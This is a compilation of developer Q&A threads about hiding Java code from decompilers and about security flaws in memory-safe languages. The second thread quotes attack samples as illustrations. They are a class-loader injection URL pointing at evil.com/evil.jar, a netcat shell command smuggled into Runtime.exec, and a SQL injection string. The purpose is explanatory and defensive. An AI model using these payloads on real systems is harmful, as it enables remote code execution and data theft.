I'm concerned about the security of Java executables. They offer little protection against decompilation. With tools like Java Decompiler even a kid can decompile the class files to get the original code.
Apart from code obfuscation what can be done to protect a class file? Is the Encrypted Class Loader still a myth?
In a previous company we had such questions, mainly driven by management paranoia.
First of all, you have to understand that absolute security is a myth: as long as your program runs on untrusted hardware, it can be decompiled, no matter what language you use. The only thing you can change is the cost for an attacker to understand your software/algorithm/data.
Concerning obfuscation: it can be considered a first level of protection, as it makes the Java code much harder to read. Good obfuscators like ProGuard use forbidden characters in variable and method names, which prevents the decompiled code from being recompiled as-is. So one could consider it a good enough security measure, since decompiling is no longer as simple as running Jad or another decompiler and getting perfectly working Java code back. However, it is still possible to understand most of the algorithms exposed in such code: code only has to be readable to be understood, not recompilable.
Additional security measures include:
Running sensitive code on a server, using some kind of web service to send inputs and retrieve results (REST/SOAP/YouNameIt)
Loading sensitive code from a remote server using HTTPS and (maybe) additional security layers.
Of those two security measures, I would honestly choose the first (a minimal client sketch follows). Indeed, the second can be subverted by typical HTTPS attacks (man in the middle, logging proxies, and so on) and has the major inconvenience of still putting the code on untrusted hardware, from where it can eventually be extracted.
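As an illustration of the first measure, here is a minimal sketch of a client that sends its inputs to a server you control and only receives the result back. The endpoint URL and the JSON payload are invented for this example, and it assumes Java 11+ for java.net.http:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class RemoteAlgorithmClient {
    private static final HttpClient CLIENT = HttpClient.newHttpClient();

    // The sensitive algorithm runs server-side; the client only ships data back and forth.
    public static String compute(String inputJson) throws Exception {
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.com/secret-algorithm"))
                .header("Content-Type", "application/json")
                .POST(HttpRequest.BodyPublishers.ofString(inputJson))
                .build();
        return CLIENT.send(request, HttpResponse.BodyHandlers.ofString()).body();
    }
}

The point is that the JAR shipped to clients contains nothing but this kind of plumbing; the valuable logic never leaves your machines.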
Basically, there are four things you can do with your bytecode to protect it against Java decompilers:
obfuscation
software encryption
hardware encryption
native compilation
All four are covered in my article Protect Your Java Code - Through Obfuscators And Beyond.
You can write all your code in native code. Reverse engineering is still possible, but it is harder.
Admittedly, this is not a strictly Java solution.
As nfechner said in a comment: write an open source application.
I have been working alone on a project for a company for more than two years. The project is a really big one, using rxtx to communicate with a hardware device. I used Java 8 and JavaFX for the UI. Now it is almost finished, and I am starting to look into how to deliver the end-user application that the company will distribute to its clients.
The problem is that the company I am working with wants the code to be unreachable once the software is in the final clients' hands, because the Java code contains some extremely sensitive information that could have very bad consequences for the company if the final clients happened to learn it. The clients could literally perform actions they don't have the right to perform.
So after searching (a lot) and thinking about my case, I understood that shipping an obfuscated JAR isn't the solution. I then tried to generate a JAR and turn it into an EXE, but all I succeeded in doing was wrapping the JAR in an EXE, which does not prevent extracting the JAR and then easily seeing all the code. Finally, I found that I should use ahead-of-time (AOT) compilation, for example with the GCJ compiler, to produce a native binary from my Java code, but here I am stuck, because after watching videos and reading articles I didn't manage to find a clear way to produce that native binary.
I am now confused, since I don't know whether I am on the right path or totally wrong and there is another way of protecting the code (at least from non-professional hackers; I understand that it is not possible to make it 100% safe, I am just looking for a reasonable approach). How should I manage this final step of my work?
I currently work for a company that has code we don't want anyone to have access to, for the security of our clients and, less importantly, for legal reasons. ;-)
One possible solution you could look into would be to rewrite the code you deem most sensitive into a C/C++ library. It would be possible to compile this into a .so/.dll/.dylib file for the respective OSs and it would make it difficult, not entirely impossible, but difficult to decompile.
The trouble would come from learning how to access native code from Java, as much of the documentation is unhelpful or simply nonexistent. This uses the Java Native Interface (JNI), which allows Java to, well, interface with the native (compiled C/C++) code. It makes it possible to create a JAR file that effectively becomes a Java library you can use throughout the rest of your project. The native code, however, will still need to be loaded at runtime, but that's part of learning how JNI works. A helpful link I found for JNI is http://jnicookbook.owsiak.org/ (for as long as it's still a functional link).
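To give a feel for the Java side of JNI, here is a minimal sketch; the class, method, and library names are invented for this example, and the matching C implementation would be written against the header generated by javac -h:

public class SensitiveOps {
    static {
        // Loads libsensitive.so / sensitive.dll / libsensitive.dylib from java.library.path
        System.loadLibrary("sensitive");
    }

    // Implemented in the native library (e.g. as Java_SensitiveOps_computeSecret in C)
    public static native double computeSecret(double input);
}

From the rest of the project you would just call SensitiveOps.computeSecret(x) as if it were ordinary Java.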
One of our clients here where I work has a project written in Java and needed to implement our code that is unfortunately all written in C. So we needed a way to access this C/C++ code from Java. This is the way we went about solving this issue without rewriting our code in Java. But we had the benefit (?) of having already written our code in C.
This solution, which means writing a bunch of extra code at the last minute in a language I may or may not be familiar with, doesn't sound like a particularly fun time.
I would be curious to learn what possible problems others might see with this solution.
How can I package my Java application into an executable JAR that cannot be decompiled (for example, by Jadclipse)?
You can't. If the JRE can run it, an application can de-compile it.
The best you can hope for is to make it very hard to read (replace all symbols with combinations of 'l' and '1' and 'O' and '0', put in lots of useless code and so on). You'd be surprised how unreadable you can make code, even with a relatively dumb translation tool.
This is called obfuscation and, while not perfect, it's sometimes adequate.
Remember, you can't stop the determined hacker any more than the determined burglar. What you're trying to do is make things very hard for the casual attacker. When presented with the symbols O001l1ll10O, O001llll10O, OO01l1ll10O, O0Ol11ll10O and O001l1ll1OO, and code that doesn't seem to do anything useful, most people will just give up.
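As a hedged illustration of how far simple renaming goes, compare a readable method with roughly what a decompiler might show after an obfuscator has renamed everything (both versions are invented for this example):

public class PricingExample {
    // Before obfuscation: the intent is obvious from the names
    public double netPrice(double gross, double taxRate) {
        return gross / (1 + taxRate);
    }

    // Roughly what a decompiler shows after renaming: same logic, meaningless names
    public double O001l1ll10O(double O001llll10O, double OO01l1ll10O) {
        return O001llll10O / (1.0 + OO01l1ll10O);
    }
}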
First, you can't avoid people reverse engineering your code. The JVM bytecode has to be readable in order to be executed, and there are several programs that reverse engineer it (the same applies to the .NET CLR). You can only raise the barrier, i.e. the cost, of seeing and understanding your code.
The usual way is to obfuscate the source with some tool. Classes, methods and fields are renamed throughout the codebase, even with invalid identifiers if you choose to, making the code next to impossible to comprehend. I had good results with JODE in the past. After obfuscating, use a decompiler to see what your code looks like...
Next to obfuscation, you can encrypt your class files (all but a small starter class) with some method and use a custom class loader to decrypt them. Unfortunately, the class loader class can't be encrypted itself, so people may figure out the decryption algorithm by reading the decompiled code of your class loader. But the window for attacking your code gets smaller. Again, this does not prevent people from seeing your code; it just makes it harder for the casual attacker.
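A minimal sketch of such a decrypting class loader follows. The file layout and the decrypt step are placeholders invented for this example, and, as noted above, the loader itself (and whatever key it uses) cannot be protected the same way:

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class DecryptingClassLoader extends ClassLoader {
    private final Path encryptedDir;

    public DecryptingClassLoader(Path encryptedDir, ClassLoader parent) {
        super(parent);
        this.encryptedDir = encryptedDir;
    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {
        try {
            // Read the encrypted bytecode, decrypt it, and hand it to the JVM.
            byte[] encrypted = Files.readAllBytes(
                    encryptedDir.resolve(name.replace('.', '/') + ".class.enc"));
            byte[] bytecode = decrypt(encrypted);
            return defineClass(name, bytecode, 0, bytecode.length);
        } catch (IOException e) {
            throw new ClassNotFoundException(name, e);
        }
    }

    private byte[] decrypt(byte[] data) {
        // Placeholder: real code would use javax.crypto (e.g. AES), but the key
        // has to live somewhere the attacker can also reach, which is the weakness.
        return data;
    }
}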
You could also try to convert the Java application to some windows EXE which would hide the clue that it's Java at all (to some degree) or really compile into machine code, depending on your need of JVM features. (I did not try this.)
GCJ is a free tool that can compile to either bytecode or native code. Keep in mind that this does sort of defeat the purpose of Java.
A little late I know, but the answer is no.
Even if you write in C and compile to native code, there are disassemblers and debuggers that will allow people to step through your code. Granted, debugging optimized code without symbolic information is a pain, but it can be done; I've had to do it on occasion.
There are steps you can take to make this harder. For example, on Windows you can call the IsDebuggerPresent API in a loop to see if somebody is debugging your process and, if so and it is a release build, terminate the process. Of course, a sufficiently determined attacker could intercept your call to IsDebuggerPresent and make it always return false.
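IsDebuggerPresent is a native Windows API, but a rough Java analogue (my own hedged sketch, not a standard recipe) is to check whether a JDWP debug agent was passed to the JVM. An attacker can attach by other means or simply patch this check out, exactly as with the native call:

import java.lang.management.ManagementFactory;

public final class DebuggerCheck {
    // Returns true if the JVM was started with a JDWP debug agent attached.
    public static boolean jdwpAgentPresent() {
        return ManagementFactory.getRuntimeMXBean().getInputArguments().stream()
                .anyMatch(arg -> arg.contains("-agentlib:jdwp") || arg.contains("-Xrunjdwp"));
    }
}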
A whole variety of techniques has cropped up on both sides: people who want to protect something and people who are out to crack it wide open. It is a veritable arms race! Once you go down this path, you will have to constantly keep updating and upgrading your defenses; there is no stopping.
This is not my own practical solution, but here is what I think is a good collection of resources and tutorials for getting as close to that goal as possible.
A suggestion from this website (Oracle community):
1. (Clean way) Obfuscate your code. There are many open source and free obfuscator tools; here is a simple list of them: [Open source obfuscators list]. These tools make your code unreadable (though it can still be decompiled) by changing names. This is the most common way to protect your code.
2. (Not so clean way) If you have a specific target platform (like Windows), or you can ship different versions for different platforms, you can write a sophisticated part of your algorithms in a low-level language like C (which is very hard to decompile and understand) and use it as a native library in your Java application. It is not clean, because many of us use Java for its cross-platform abilities, and this method takes that ability away.
And here is a step-by-step guide to follow:
ProtectYourJavaCode
Enjoy!
Keep adding your solutions; we need more of this.
I'm writing my process in C++.
Now I want to write its GUI.
I was thinking of using Java in order to do this and link it using JNI, but then I thought of a security problem...
Suppose I have my GUI.exe file written in Java, and I also have my Engine.dll file written in c++.
What would prevent evil evil people from taking my DLL and linking it to their program?
I do use license validation in my C++ DLL, but it can be broken by these evil evil people.
I know every program can be cracked, but I don't want to just GIVE them my engine for easy use.
Is there a way to secure this link?
Or should I use C++ for writing the GUI as well?
The most portable solution probably involves encrypting the data entering and leaving your DLL by whatever means seems appropriate. Obfuscation of the C++ side isn't necessary at that point. This would require the encryption keys to be embedded in both the C++ binary and whatever you are compiling your Java to; you could take extra steps to make this inconvenient to find by hiding it with a large slab of random junk and indexing into it, for example.
Another alternative is to pay up for a licensing system that would be checked at call or link time by ubercool.dll.
Ultimately you're trying to perform a bit of a doomed defensive action. If your ubercool function is genuinely valuable or useful and someone wants to use it in ways you'd rather they didn't, they'll work out how. Can anyone think of any commercial software that hasn't been cracked?
Lastly, you can run your software on a system which is impractical for the end user to fiddle with. Mobile devices with locked bootloaders, TPM modules and so on are one way to do this; the other is to run your ubercool stuff as a hosted service to which people may connect if they have appropriate credentials which you can of course control.
Consider using an obfuscator for the Java or C# code that will use your DLL. This will not solve the whole problem, but it will make your program more difficult to reverse engineer.
Also, if your project is written in C++, you may consider using C++/CLI for the GUI part of your application.
I just recently finished reading Secure Coding in C and C++ by Brian Seacord, who works for CERT.
Overall, it's an excellent book and I would recommend it to any programmer who hasn't yet read it. After reading it, it occurs to me that for all the various types of security vulnerabilities (such as exploit code injection, buffer overflows, integer overflows, string formatting vulnerabilities, etc.), every single security hole seems to come down to one thing: the ability to access a memory address that isn't bounded by a buffer that was legitimately allocated by the process.
The ability to inject malicious code, or reroute the program logic depends entirely on being able to access memory addresses that fall outside legitimately allocated buffers. But in a language like Java, this is simply impossible. The worst that could happen is a program will terminate with an ArrayIndexOutOfBoundsException, leading to a denial-of-service.
So are there any security vulnerabilities possible in "safe" languages like Java, where invalid memory accesses are not possible? (I use Java as an example here, but really I'm interested in knowing about security vulnerabilities in any language that prevents invalid memory accesses.)
Of course a book focused on C/C++ will focus on the most common exploits: memory tricks on the stack and so forth.
As for an "obvious" example of a language with plenty of security caveats without any direct memory access, how about PHP? Aside from the usual XSS, CSRF and SQL injection, you've got remote code injection on older versions of PHP because of include magic and so forth. I'm sure there are Java examples, but I'm not a Java security expert...
But because Java security experts do exist, I'm sure there are cases you have to worry about (in particular, I'm sure SQL injection also plagues naive Java web developers).
EDIT: off the top of my head, Java does have dynamic loading of classes through ClassLoader. If you were to write a custom class loader for some reason, and you didn't verify the .class files, then you would open your program up to code-injection. If this custom class loader somehow read classes from the internet, then it would also be possible to have remote code injections. And as strange as it sounds, this is pretty common. Consider Eclipse and its plugin framework. Very literally, it is loading downloaded code automatically and then running them. I admit, I don't know the architecture of Eclipse, but I bet you that security is a concern for Eclipse plugin developers.
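To make the risk concrete, here is a hedged sketch of what loading and running unverified remote code looks like; the URL and class name are invented, and a real plugin framework should at least verify a signature on the downloaded jar before instantiating anything from it:

import java.net.URL;
import java.net.URLClassLoader;

public class UnverifiedPluginLoader {
    public static void runRemotePlugin() throws Exception {
        try (URLClassLoader remote = new URLClassLoader(
                new URL[] { new URL("https://plugins.example.com/plugin.jar") })) {
            Class<?> plugin = Class.forName("com.example.Plugin", true, remote);
            Runnable task = (Runnable) plugin.getDeclaredConstructor().newInstance();
            task.run();   // the downloaded code now runs with your program's privileges
        }
    }
}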
The ability to inject malicious code, or reroute the program logic depends entirely on being able to access memory addresses that fall outside legitimately allocated buffers.
This strikes me as a narrow view of what is and isn't malicious. SQL injection, for example (or indeed any type of injection), doesn't require buffer overflows and still injects malicious code into your system. That said, memory-related problems are certainly still possible: for example, some managed languages allow the NUL character in the middle of their managed string classes. There have been interesting bugs where such a string was passed to the underlying OS, whose C/C++-driven API truncates the string at the first \0 it finds, which may, for example, allow you to wander around the file system at will due to truncation errors.
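A tiny hedged sketch of that mismatch (file names invented for the example): the Java-side check passes, while a C-style consumer of the same bytes stops at the first NUL:

public class NulTruncationDemo {
    public static void main(String[] args) {
        // Java strings may contain '\0', so this naive extension check passes...
        String requested = "../../etc/passwd\0harmless.png";
        System.out.println(requested.endsWith(".png"));   // prints true
        // ...but a C API handed these bytes reads the name as "../../etc/passwd",
        // the part the check above never looked at.
    }
}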
Then there's bad encryption, information leaks and all sorts of other fun security errors which don't involve buffers ...
Yes. This has happened more than once. Just because a language makes it hard to make an invalid memory access doesn't automatically protect you from attacks. There's also the whole "social engineering" thing, which can make users run malicious programs without requiring any exploits at all!
The best you can do is keep your software up to date, use programming practices that reduce bugs, fix serious bugs as soon as they're discovered, and educate users.
Here's an interesting security hole, arguably much more likely in a Java system than in a C++ system:
Suppose a web framework uses reflection to set object fields from URL parameters:
/update?a=1&b[2]=2&c.x=3&c.y=4
Very convenient and powerful: it allows traversal of any object graph...
Then an attacker feeds it a URL like this:
/update?class.classLoader.ucp.urls.elementData[0]=http://evil.com/evil.jar
Game over. The entire system is under the control of the attacker.
See http://seclists.org/fulldisclosure/2010/Jun/456
And I don't think it only happened to Spring. There are a lot of Java systems out there pretty much exposing their bellies to the open world.
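Here is a toy, hedged sketch of the kind of binding code that creates this exposure (names invented; it only handles flat String fields, but the trust problem is the same: the attacker chooses which field gets set):

import java.lang.reflect.Field;
import java.util.Map;

public class NaiveBinder {
    // Every request parameter name is treated as a field on the target object,
    // with no whitelist of allowed properties.
    public static void bind(Object target, Map<String, String> params) throws Exception {
        for (Map.Entry<String, String> e : params.entrySet()) {
            Field f = target.getClass().getDeclaredField(e.getKey()); // attacker-chosen name
            f.setAccessible(true);
            f.set(target, e.getValue());
        }
    }
}

The real-world frameworks that got burned supported nested property paths as well, which is what made reaching class.classLoader possible.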
From Sun's own Secure Coding Guidelines for the Java Programming Language, Version 3.0:
The Java platform has its own unique set of security challenges. One of its main design considerations is to provide a secure environment for executing mobile code. While the Java security architecture can protect users and systems from hostile programs downloaded over a network, it cannot defend against implementation bugs that occur in trusted code. Such bugs can inadvertently open the very holes that the security architecture was designed to contain...
Unchecked user input can lead to a lot of security holes:
stmt.executeQuery("SELECT * FROM Users where userName='" + userName + "'");
If userName isn't validated and comes from an external source, someone can easily provide their userName as "john' or userName != '", leading to exposure of all the data in your table.
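For completeness, a hedged sketch of the usual fix, assuming a java.sql.Connection named conn is already in scope: bind the user-supplied value as a parameter instead of concatenating it into the SQL text.

PreparedStatement stmt = conn.prepareStatement(
        "SELECT * FROM Users WHERE userName = ?");
stmt.setString(1, userName);   // the value is sent as data, never parsed as SQL
ResultSet rs = stmt.executeQuery();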
Runtime.getRuntime().exec(command);
Same thing here. If command isn't validated and comes from an external source, someone clever could run, say,
"/bin/sh | nc -l 10000" or the like, gaining shell access on the server. Or inject a C source program exploiting a local security hole and have command compile and run it right on the server.
So the virtual machine implementation just becomes the thing you need to find a vulnerability in. And if you think locking down VM implementations is easy, read this amazing account of the details of an exploit for the ActionScript virtual machine and consider whether you could really ever guarantee such holes didn't exist.
There are tons of security exploits that can affect pretty much any language, some old, some new.
An example of an old school exploit would be creating a temporary file with insecure permissions or in an insecure directory - resulting in information leaking or an attacker inserting their own info.
SQL injection exploits have been around for a long time as well (i.e. passing unvalidated text from the user into the SQL parser).
XSS type attacks are relatively new, and easy to create in any server programming language.
Java is more secure than C++ with respect to memory exploits (due to the explicit bounds checking built into the language). This eliminates the whole category of buffer overflow exploits.
BUT Java is not perfectly safe.
Features built into the language for the programmer's convenience can be used as part of a malicious attack. E.g. using reflection, a program can find out the values of class variables and modify them (there are ways to get around the security manager, or at least so I have read).
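A small, hedged sketch of that reflection concern (class and field names invented, and it assumes the field is a double): with no security manager in the way, even a private field can be read and rewritten from outside the class.

import java.lang.reflect.Field;

public class ReflectionPoke {
    public static void overridePrice(Object order) throws Exception {
        Field price = order.getClass().getDeclaredField("price");
        price.setAccessible(true);      // bypasses the private modifier
        price.setDouble(order, 0.0);    // the supposedly protected price is now zero
    }
}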
Serialization has issues (check out RMI vulnerabilities), and there are many APIs programmers use without worry that could end badly, e.g. APIs that use our program's class loader to load "untrusted" libraries.
A lot of programming security vulnerabilities can be classified as injection attacks that are specific to a given language or framework. You've been reading specifically about injection attacks in C++, whereby a user can inject code via a buffer overflow or string formatting vulnerability. If you extend your research to HTML you'll find that cross-site scripting (injection of JS code) and SQL injection (injection of SQL queries) are pretty common. Take a look at PHP and you'll note that command level injection tends to be a regular issue.
Ultimately each language and framework has its problems. Be aware of them. And of course, business logic security errors will continue to exist regardless of the language, framework or OS that you use. For example, a shopping cart that allows a negative quantity of items to be purchased for a negative total amount is a security problem simply due to poor programming.
Java programs don't run on thin air; they run on a whole platform, and the programmers of that platform are just humans who make programming errors. While your Java code itself may be safe, you need the platform to run it, which opens other attack vectors.
I'm disappointed that this one wasn't mentioned since the question pertains to Java, which is especially vulnerable to this sort of oversight:
In Java, visibility is a key concern for a software developer trying to ensure that his code is secure. Especially in the context of extensible frameworks, where I'll frequently be running "foreign" code, it is vital that I not overexpose information that I trust as valid.
If I've made something public that should, in fact, be private, I've introduced a potential vulnerability. If I pass a reference to an object that I'm actively using instead of a defensive copy, I might inadvertently expose data that the standard user shouldn't have access to. Sometimes you want the user to have a reference and not a copy, but if this is a piece of data that survives for a while, you'll want to consider making a copy just to ensure that you keep control of the data from that point forward.
Allowing someone a reference to a member data field in a class I'm treating as immutable, might cause interesting or bizarre behavior to occur. Data could be modified after I've done validity checking and sanitized it.
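A small sketch of that defensive-copy advice, using an invented Booking class: the constructor and getter copy the mutable Date instead of sharing the caller's reference, so later mutation cannot bypass the validity check.

import java.util.Date;

public final class Booking {
    private final Date start;

    public Booking(Date start) {
        this.start = new Date(start.getTime());   // copy in before validating
        if (this.start.before(new Date())) {
            throw new IllegalArgumentException("start is in the past");
        }
    }

    public Date getStart() {
        return new Date(start.getTime());          // copy out, never the internal reference
    }
}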
Is there a way to deploy a Java program in a format that is not reverse-engineerable?
I know how to convert my application into an executable JAR file, but I want to make sure that the code cannot be reverse engineered, or at least, not easily.
Obfuscation of the source code doesn't count... it makes it harder to understand the code, but does not hide it.
A related question is How to lock compiled Java classes to prevent decompilation?
Once I've completed the program, I would still have access to the original source, so maintaining the application would not be the problem. If the application is distributed, I would not want any of the users to be able to decompile it. Obfuscation does not achieve this as the users would still be able to decompile it, and while they would have difficulty following the action flows, they would be able to see the code, and potentially take information out of it.
What I'm concerned about is if there is any information in the code relating to remote access. There is a host to which the application connects using a user-id and password provided by the user. Is there a way to hide the host's address from the user, if that address is located inside the source code?
The short answer is "No, it does not exist".
Reverse engineering is a process that does not necessarily involve looking at the code at all. It's basically trying to understand the underlying mechanisms and then mimicking them. For example, that's how JScript came out of MS labs: by copying Netscape's JavaScript behavior without having access to the code. The copy was so perfect that even the bugs were copied.
You could obfuscate your JAR file with YGuard. It doesn't obfuscate your source code, but the compiled classes, so there is no problem about maintaining the code later.
If you want to hide some string, you could encrypt it, making it harder to recover by looking at the decompiled code (and even better if you obfuscate the JAR file).
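A hedged sketch of that idea (the key bytes and method names are invented): the value is stored encrypted and only decrypted at runtime. The obvious limit is that the key ships in the same JAR, so this slows down a casual reader of the decompiled code but cannot stop a determined one.

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class HiddenString {
    private static final byte[] KEY = "0123456789abcdef".getBytes(StandardCharsets.UTF_8);

    // Run once offline to produce the Base64 constant you embed instead of the plain value.
    static String encrypt(String plain) throws Exception {
        Cipher c = Cipher.getInstance("AES");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"));
        return Base64.getEncoder().encodeToString(c.doFinal(plain.getBytes(StandardCharsets.UTF_8)));
    }

    // Called at runtime to recover the hidden string from the embedded constant.
    static String decrypt(String encoded) throws Exception {
        Cipher c = Cipher.getInstance("AES");
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"));
        return new String(c.doFinal(Base64.getDecoder().decode(encoded)), StandardCharsets.UTF_8);
    }
}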
If you know which platforms you are targeting, get something that compiles your Java into native code, such as Excelsior JET or GCJ.
Short of that, you're never going to be able to hide the source code, since the user always has your bytecode and can Jad it.
You're writing in a language that has introspection as part of the core language. It generates .class files whose specifications are widely known (thus enabling other vendors to produce clean-room implementations of Java compilers and interpreters).
This means there are publicly-available decompilers. All it takes is a few Google searches, and you have some Java code that does the same thing as yours. Just without the comments, and some of the variable names (but the function names stay the same).
Really, obfuscation is about all you can get (though the decompiled code will already be slightly obfuscated) without going to C or some other fully-compiled language, anyway.
Don't use an interpreted language? What are you trying to protect anyway? If it's valuable enough, anything can be reverse engineered. The chances of someone caring enough to reverse engineer most projects is minimal. Obfuscation provides at least a minimal hurdle.
Ensure that your intellectual property (IP) is protected via other mechanisms. Particularly for security code, it's important that people be able to inspect implementations, so that the security is in the algorithm, not in the source.
I'm tempted to ask why you'd want to do this, but I'll leave that alone...
The problem I see is that the JVM, like the CLR, needs to be able to interpret your code in order to JIT-compile and run it. You can make it more "complex", but given that the bytecode spec is rather well documented and exists at a much higher level than something like the x86 assembly spec, it's unlikely you can "hide" the process flow, since it's got to be there for the program to work in the first place.
Make it into a web service. Then you are the only one that can see the source code.
It can't be done.
Anything that can be compiled can be de-compiled. The very best you can do is obfuscate the hell out of it.
That being said, there is some interesting stuff happening in Quantum Cryptography. Essentially, any attempt to read the message changes it. I don't know if this could be applied to source code or not.
Even if you compile the code into native machine language, there are all sorts of programs that let you essentially decompile it into assembly language and follow the process flow (OlyDbg, IDA Pro).
It cannot be done. This is not a Java problem. Any language that can be compiled can be decompiled; for Java, it's just easier.
You are trying to show somebody a picture without actually showing it to them. It is not possible. You also cannot hide your host, even if you hide it at the application level: someone can still grab it via Wireshark or any other network sniffer.
As someone said above, reverse engineering can always decompile your executable. The only way to protect your source code (or algorithm) is not to distribute your executable.
For example, separate your application into server code and a client app, hide the important part of your algorithm in the server code and run it on a cloud server, and distribute only the client code, which works just as a data sender and getter.
This way, even if your client code is decompiled, you are not losing anything.
But this will certainly decrease performance and user convenience.
I think this may not be the answer you are looking for, but I just wanted to raise a different idea for protecting source code.
With anything interpreted, at some point it has to be processed "in the clear". The string would show up clear as day once the code is run through JAD. You could deploy an encryption key with your app or do a basic Caesar cipher to encrypt the host connection info and decrypt it at runtime...
But at some point during processing the host connection information must be put in the clear in order for your app to connect to the host...
So you can hide it statically, but you can't hide it at runtime if they are running a debugger.
This is impossible. The CPU will have to execute your program, i.e. your program must be in a format that a CPU can understand. CPUs are much dumber than humans. Ergo, if a CPU can understand your program, a human can.
If you have concerns about concealing the code, I'd run ProGuard anyway.